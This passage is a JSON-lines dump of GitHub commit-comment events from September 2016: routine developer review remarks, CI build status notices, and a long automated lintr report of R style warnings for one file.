{"id":"4597034844","type":"CommitCommentEvent","actor":{"login":"Alokpandey571998"},"repo":{"name":"ptimothyp/python"},"payload":{"comment":{"id":19115641,"position":null,"line":null,"path":null,"commit_id":"adce86b921eae432cb6640c9721b361850d98587","created_at":"2016-09-21T15:31:14Z","updated_at":"2016-09-21T15:31:14Z","body":"Hello sir. How r u doing. I just want to know what is the value of n. \r\n"}},"created_at":"2016-09-21T15:31:14Z"}
{"id":"4597039351","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"ChrisMacNaughton/vault-rs"},"payload":{"comment":{"id":19115660,"position":null,"line":null,"path":null,"commit_id":"1f346ecd3e3c6db8e94e73fc189114282fe6ee8b","created_at":"2016-09-21T15:31:53Z","updated_at":"2016-09-21T15:31:53Z","body":"@ChrisMacNaughton Ah, yes, rustfmt! Thank you. I'll be sure to run it in the future before submitting PRs."}},"created_at":"2016-09-21T15:31:53Z"}
{"id":"4597039711","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19115661,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-21T15:31:56Z","updated_at":"2016-09-21T15:31:56Z","body":"Yup. Could you send a PR? "}},"created_at":"2016-09-21T15:31:56Z"}
{"id":"4597043359","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"Reception123/puppet"},"payload":{"comment":{"id":19115668,"position":null,"line":null,"path":null,"commit_id":"c07e71f61384b25296ca67496b7fc3a3ce24f08d","created_at":"2016-09-21T15:32:29Z","updated_at":"2016-09-21T15:32:29Z","body":"Will fail because of pre existing definition\r\n\r\nYou need to drop the title to a command => '' param then name it something unique "}},"created_at":"2016-09-21T15:32:29Z"}
{"id":"4597052958","type":"CommitCommentEvent","actor":{"login":"pichillilorenzo"},"repo":{"name":"pichillilorenzo/JavaScript-Completions"},"payload":{"comment":{"id":19115684,"position":null,"line":null,"path":null,"commit_id":"b2f199786ff88b607033b3e6eba8f5380db7b7d6","created_at":"2016-09-21T15:33:56Z","updated_at":"2016-09-21T15:33:56Z","body":"fix for #13 * on windows, not #12"}},"created_at":"2016-09-21T15:33:56Z"}
{"id":"4597053825","type":"CommitCommentEvent","actor":{"login":"pfitzseb"},"repo":{"name":"JunoLab/atom-julia-client"},"payload":{"comment":{"id":19115687,"position":null,"line":null,"path":null,"commit_id":"945f9391d1fda2d81f5defb5cda0cc5fe47458fb","created_at":"2016-09-21T15:34:04Z","updated_at":"2016-09-21T15:34:04Z","body":"I suspected the splatting [here](https://github.com/JunoLab/atom-julia-client/blob/master/lib/misc.coffee#L19) was the cause, but changing this to `Array.prototype.push.apply buffer, lines` (which should be more performant, but I dunno how cs handles splatting) didn't change much for me.\r\n\r\nThis isn't as much of an issue since the CodeTools fix though, so we could probably revert this."}},"created_at":"2016-09-21T15:34:04Z"}
{"id":"4597059990","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19115717,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T15:35:02Z","updated_at":"2016-09-21T15:35:02Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2336 of 2339 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T15:35:02Z"}
{"id":"4597062371","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19115725,"position":42,"line":42,"path":"Common/Securities/Option/DefaultQLUnderlyingVolatilityEstimator.cs","commit_id":"b3590647b50d2103b1eb110740cccdb87218eb90","created_at":"2016-09-21T15:35:24Z","updated_at":"2016-09-21T15:35:24Z","body":"curious about the suffix `Handle` on some of these types. What is this in reference to?"}},"created_at":"2016-09-21T15:35:24Z"}
{"id":"4597063223","type":"CommitCommentEvent","actor":{"login":"Time-Jang"},"repo":{"name":"Time-Jang/WebApp"},"payload":{"comment":{"id":19115729,"position":null,"line":null,"path":null,"commit_id":"c1139d02881d48b92439446cd537ad73c60205d3","created_at":"2016-09-21T15:35:31Z","updated_at":"2016-09-21T15:35:31Z","body":"lab2"}},"created_at":"2016-09-21T15:35:31Z"}
{"id":"4597063650","type":"CommitCommentEvent","actor":{"login":"normanr"},"repo":{"name":"yacoob/aib2ofx"},"payload":{"comment":{"id":19115731,"position":null,"line":null,"path":null,"commit_id":"132ab1fd07548e1c8c39776bffdd1c9dc81af0fb","created_at":"2016-09-21T15:35:36Z","updated_at":"2016-09-21T15:35:36Z","body":"Why not make this conditional?  That way when AIB add and remove their interstitial it'll automatically adapt."}},"created_at":"2016-09-21T15:35:36Z"}
{"id":"4597064113","type":"CommitCommentEvent","actor":{"login":"Turbo87"},"repo":{"name":"kerel-fs/skylines"},"payload":{"comment":{"id":19115737,"position":null,"line":null,"path":null,"commit_id":"583c37c5b60da074a1c2d39837d736e459af8e1c","created_at":"2016-09-21T15:35:40Z","updated_at":"2016-09-21T15:35:40Z","body":"I think you're running the npm, bower and ember commands in the wrong folder. could that be the problem?"}},"created_at":"2016-09-21T15:35:40Z"}
{"id":"4597067270","type":"CommitCommentEvent","actor":{"login":"johnphho"},"repo":{"name":"johnphho/neuraltalk2"},"payload":{"comment":{"id":19115748,"position":null,"line":null,"path":null,"commit_id":"7e1009c7201e31560661e777d7b1b2e313c7be5a","created_at":"2016-09-21T15:36:08Z","updated_at":"2016-09-21T15:36:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;QSVIOM79&#x2F;15-fixed-video-captioning-using-gpu\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fixed video captioning using GPU</a>"}},"created_at":"2016-09-21T15:36:08Z"}
{"id":"4597067384","type":"CommitCommentEvent","actor":{"login":"Huluti"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19115749,"position":5,"line":0,"path":"dbr/__init__.py","commit_id":"6c7517b5cb8d5f3f44ff62fbcdb94e115d8a85e5","created_at":"2016-09-21T15:36:09Z","updated_at":"2016-09-21T15:36:09Z","body":"See https://www.python.org/dev/peps/pep-0008/.\r\n\r\n> Avoid trailing whitespace anywhere. Because it's usually invisible, it can be confusing: e.g. a backslash followed by a space and a newline does not count as a line continuation marker. Some editors don't preserve it and many projects (like CPython itself) have pre-commit hooks that reject it. \r\n\r\nWhat editor do you use ? Today most editors automatically remove trailling whitespace on save."}},"created_at":"2016-09-21T15:36:09Z"}
{"id":"4597067952","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19115750,"position":5,"line":16,"path":"Cura.proto","commit_id":"281e647b82ea58d19fa43b833ea9a9d4dba5fba8","created_at":"2016-09-21T15:36:14Z","updated_at":"2016-09-21T15:36:14Z","body":"No"}},"created_at":"2016-09-21T15:36:14Z"}
{"id":"4597069351","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19115752,"position":null,"line":null,"path":null,"commit_id":"9c7187bf46d523465e6693ddc0804ce2af7cd736","created_at":"2016-09-21T15:36:26Z","updated_at":"2016-09-21T15:36:26Z","body":"Reprinted with new name [Aether Tradewinds](http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=417611&part=%C3%86ther+Tradewinds) Although a different name, still the same card printed in earlier sets."}},"created_at":"2016-09-21T15:36:26Z"}
{"id":"4597070459","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19115756,"position":null,"line":null,"path":null,"commit_id":"49999c960cedd86bccc5ea8740d8a6e829d3f6f4","created_at":"2016-09-21T15:36:36Z","updated_at":"2016-09-21T15:36:36Z","body":"*This is a note for reader of this commit*\r\n\r\n  * projects/GKCommon/GKCommon/UDN.cs [Gregorian, Jilian]\r\n\r\nConversions to/from Gregorian and Julian calendars are made now by implementations based on the [Wikipedia article](https://en.wikipedia.org/wiki/Julian_day). Those algorithms give reversible conversions in contrast to other implementations (see [CalendarConverter project](https://github.com/Serg-Norseman/CalendarConverter) for more information, especially conversation at commit https://github.com/Serg-Norseman/CalendarConverter/commit/c27427ae830add3b739f7cfba1986a20f69e9a52)."}},"created_at":"2016-09-21T15:36:36Z"}
{"id":"4597071404","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115757,"position":null,"line":null,"path":null,"commit_id":"ec8ac2f0f257bee0ed8a21889f8e1933f6209791","created_at":"2016-09-21T15:36:45Z","updated_at":"2016-09-21T15:36:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1087](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13801&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T15:36:45Z"}
{"id":"4597071739","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19115759,"position":33,"line":null,"path":"Script/AtomicEditor/ui/modal/ModalOps.ts","commit_id":"072884db58f03503ffa57c513a41e29e6517576a","created_at":"2016-09-21T15:36:49Z","updated_at":"2016-09-21T15:36:49Z","body":"Dead code."}},"created_at":"2016-09-21T15:36:49Z"}
{"id":"4597073055","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19115761,"position":5,"line":91,"path":"cura/CuraApplication.py","commit_id":"479f9ea6d237dd02cc8e03d670b758b4a53b7b2e","created_at":"2016-09-21T15:37:01Z","updated_at":"2016-09-21T15:37:01Z","body":"Yes"}},"created_at":"2016-09-21T15:37:01Z"}
{"id":"4597073622","type":"CommitCommentEvent","actor":{"login":"Huluti"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19115763,"position":5,"line":0,"path":"dbr/__init__.py","commit_id":"6c7517b5cb8d5f3f44ff62fbcdb94e115d8a85e5","created_at":"2016-09-21T15:37:07Z","updated_at":"2016-09-21T15:37:07Z","body":"I think trying to respect PEP recommendations is a start to make nice code."}},"created_at":"2016-09-21T15:37:07Z"}
{"id":"4597079041","type":"CommitCommentEvent","actor":{"login":"shelhamer"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":19115781,"position":null,"line":null,"path":null,"commit_id":"c8f446f640b12b0577063eca8fab004e73c0aefc","created_at":"2016-09-21T15:37:54Z","updated_at":"2016-09-21T15:37:54Z","body":"Note that Caffe has an automatic definition upgrade path that is made use of in the `caffe` binary and the interfaces like `pycaffe`. This is the part that handles batch norm https://github.com/BVLC/caffe/blob/master/src/caffe/util/upgrade_proto.cpp#L1003-L1024 so you don't have to do it manually."}},"created_at":"2016-09-21T15:37:54Z"}
{"id":"4597081785","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19115786,"position":75,"line":null,"path":"Script/AtomicEditor/ui/AnimationViewer.ts","commit_id":"072884db58f03503ffa57c513a41e29e6517576a","created_at":"2016-09-21T15:38:22Z","updated_at":"2016-09-21T15:38:22Z","body":"Assume these are temp logs, make sure to either nuke them or make them more clear."}},"created_at":"2016-09-21T15:38:22Z"}
{"id":"4597085582","type":"CommitCommentEvent","actor":{"login":"arnaudbrejeon"},"repo":{"name":"arnaudbrejeon/XcodeClangFormat"},"payload":{"comment":{"id":19115796,"position":null,"line":null,"path":null,"commit_id":"852e5ce5dd86b0ec2448dc13f3f9e2140ca04b4b","created_at":"2016-09-21T15:38:59Z","updated_at":"2016-09-21T15:38:59Z","body":"Two different problems:\r\n* Sometimes I would need to select the file whole to get it styled, but it didn't look always necessary\r\n* Often, selections and cursor location were not maintained after styling"}},"created_at":"2016-09-21T15:38:59Z"}
{"id":"4597086381","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":19115800,"position":null,"line":null,"path":null,"commit_id":"34f3e0473955e5de3332f9cb1c7626e2df0dea9e","created_at":"2016-09-21T15:39:07Z","updated_at":"2016-09-21T15:39:07Z","body":"this looks awesome now! We could also trace other information on our assembly."}},"created_at":"2016-09-21T15:39:07Z"}
{"id":"4597089650","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19115813,"position":null,"line":null,"path":null,"commit_id":"9354340730a78aada44eda3e0b54ebde7372e586","created_at":"2016-09-21T15:39:35Z","updated_at":"2016-09-21T15:39:35Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  